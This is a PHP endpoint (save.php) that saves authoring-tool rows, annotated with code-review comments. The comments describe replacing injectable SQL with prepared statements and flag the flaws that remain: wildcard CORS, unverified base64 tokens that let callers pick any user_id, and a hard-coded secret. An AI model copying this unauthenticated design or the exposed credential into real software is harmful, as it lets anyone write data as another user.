Current File : /mnt/blockstorage/ctms-backup/api/save.php
<?php
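    // save.php: create or update one authoring_tool row for the user named in
    // the request token. Responds with a JSON object {"status": ..., ...}.

    // NOTE(review): a wildcard origin lets any website's script call this
    // state-changing endpoint. Restrict it to the known front-end origin(s)
    // once those are confirmed.
    header('Access-Control-Allow-Origin: *');
    header('Access-Control-Allow-Methods: GET, POST');
    header("Access-Control-Allow-Headers: X-Requested-With");

    // Expected to define $conn, used below as a mysqli-style connection.
    include ('database.php');

    // Emit one JSON response body.
    $respond = static function (array $data): void {
        header("Content-Type: application/json");
        echo json_encode($data);
    };

    // Run one write statement with bound parameters. Request values are never
    // concatenated into the SQL text, which is what made the previous
    // string-built UPDATE/INSERT injectable through slug, user_id and json.
    $runWrite = static function ($conn, string $sql, string $types, array $params): bool {
        $stmt = $conn->prepare($sql);
        if ($stmt === false) {
            return false;
        }
        $stmt->bind_param($types, ...$params);
        $ok = $stmt->execute();
        $stmt->close();
        return $ok;
    };

    // NOTE(review): $_REQUEST also accepts GET parameters, so a write can be
    // triggered from a plain URL and the token can end up in access logs.
    // Consider accepting POST only once the callers are confirmed.
    $rawJson  = $_REQUEST['json'] ?? null;
    $rawCode  = $_REQUEST['code'] ?? null;
    $id       = $_REQUEST['slug'] ?? null;
    $rawToken = $_REQUEST['user_token'] ?? null;

    // The token is only double-base64 encoded. Decoding it neither sanitizes
    // nor authenticates it.
    // NOTE(review): nothing in this file verifies a signature or checks
    // $expiration_time, so user_id is effectively chosen by the caller.
    // Confirm how the issuing site signs the token and enforce that here.
    $user_token = is_string($rawToken) ? base64_decode(base64_decode($rawToken)) : '';

    // NOTE(review): hard-coded and unused in this file. Load the secret from
    // configuration outside the web root, and rotate this value because it
    // has been readable in source.
    $secret_key = 'P@ssW0rd'; // The same secret key used on the source site

    // Split the token into user ID and expiration time. Padding avoids an
    // undefined-offset warning when the token contains no '|'.
    list($user_id, $expiration_time) = array_pad(explode('|', (string) $user_token), 2, null);

    if ($user_id !== null && $user_id !== '') {
        if (!is_string($rawJson) || !is_string($rawCode) || !is_scalar($id)) {
            // Missing or array-valued parameters previously produced PHP
            // warnings and malformed SQL; reject them explicitly instead.
            $respond(array("status" => "failed", "message" => "Invalid request"));
        } else {
            $id = (string) $id;

            // Kept for the success response, which has always echoed the
            // JSON-encoded form of the submitted value.
            $json = json_encode($rawJson);

            // NOTE(review): the old query interpolated json_encode() output
            // as a double-quoted SQL literal, which under default MySQL
            // settings stores approximately the raw request string. Binding
            // the raw string keeps new rows in that shape; confirm against
            // existing rows. Also confirm that isUnique() binds $id and
            // $user_id rather than interpolating them.
            if (!isUnique($id, $user_id, $conn)) {
                $ok = $runWrite(
                    $conn,
                    "UPDATE authoring_tool SET json=?, code=? WHERE slug=? AND user_id=?",
                    'ssss',
                    array($rawJson, $rawCode, $id, $user_id)
                );
                $success = array("status" => "success", "json" => $json);
            } else {
                $ok = $runWrite(
                    $conn,
                    "INSERT INTO authoring_tool (`json`,`post_id`,`slug`,`user_id`,`code`) VALUES(?,0,?,?,?)",
                    'ssss',
                    array($rawJson, $id, $user_id, $rawCode)
                );
                $success = array("status" => "success");
            }

            if ($ok) {
                $respond($success);
            } else {
                // Keep driver error text in the server log; returning it to
                // the client discloses schema and query details.
                error_log('save.php: database write failed: ' . $conn->error);
                $respond(array("status" => "failed", "message" => "Database error"));
            }
        }
    } else {
        $respond(array("status" => "failed", "message" => "User not found"));
    }

    $conn->close();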

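    /**
     * Report whether no authoring_tool row exists yet for this slug and user.
     *
     * The lookup uses a prepared statement, so $id and $user_id are sent as
     * bound values and cannot alter the query text. They were previously
     * concatenated into the SQL string.
     *
     * @param mixed $id      Slug value taken from the request.
     * @param mixed $user_id User id taken from the decoded token.
     * @param mixed $conn    mysqli-style connection (prepare() is called on it).
     *
     * @return bool true when no matching row exists. false when one exists or
     *              when the lookup could not be run; the old code fell off the
     *              end and returned null in that case, which callers testing
     *              !isUnique() treat the same way as false.
     */
    function isUnique($id,$user_id,$conn){
        $stmt = $conn->prepare("SELECT id from authoring_tool where slug=? AND  user_id=?");
        if ($stmt === false) {
            return false;
        }

        // bind_param() takes its arguments by reference, so bind locals.
        $slug = (string) $id;
        $owner = (string) $user_id;
        $stmt->bind_param('ss', $slug, $owner);

        if (!$stmt->execute()) {
            $stmt->close();
            return false;
        }

        // Buffer the result set so num_rows reflects the full match count.
        $stmt->store_result();
        $rowCount = (int) $stmt->num_rows;
        $stmt->close();

        return $rowCount === 0;
    }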
?>

